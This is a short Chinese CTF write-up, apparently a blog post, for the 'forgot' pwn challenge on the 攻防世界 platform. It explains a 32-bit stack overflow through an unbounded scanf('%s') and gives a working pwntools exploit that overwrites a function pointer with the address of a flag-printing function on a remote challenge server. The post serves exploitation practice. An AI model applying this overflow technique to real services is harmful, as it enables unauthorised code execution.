攻防世界2

樊少泽2024-10-13 22:21

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码 
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
code tsunami8 分钟前
如何在车辆数据自动化中解决Cloudflare Turnstile
运维·microsoft·自动化
GS8FG12 分钟前
Busybox生成根文件系统,并移植e2fsprogs:RK3568
linux·驱动开发
翼龙云_cloud1 小时前
亚马逊云代理商:CloudWatch Agent 全解析 5 步实现服务器监控
运维·服务器·云计算·aws·云服务器
Cyber4K2 小时前
【Nginx专项】基础入门篇:状态页、微更新、内容替换、读取、压缩及防盗链
linux·运维·服务器·nginx·github
shining3 小时前
当拿到一个新服务器时所需准备工作
linux·程序员
Bruce_Liuxiaowei3 小时前
顺藤摸瓜:一次从防火墙告警到设备实物的溯源实战
运维·网络·网络协议·安全
maosheng11463 小时前
linux的综合教程(搭建论坛教程)
linux
IpdataCloud3 小时前
效果广告中点击IP与转化IP不一致?用IP查询怎么做归因分析?
运维·服务器·网络
Deitymoon4 小时前
linux——TCPIP协议原理
linux·网络
独小乐4 小时前
018.使用I2C总线EEPROM|千篇笔记实现嵌入式全栈/裸机篇
linux·笔记·单片机·嵌入式硬件·arm·信息与通信
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free04一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛05GPT-6发布日深度解析-Symphony架构200万Token实战06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)08基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南09GPT-6核心能力解析及与现有主流大模型对比10从限购到畅通:GLM-5.1 Coding Plan接入攻略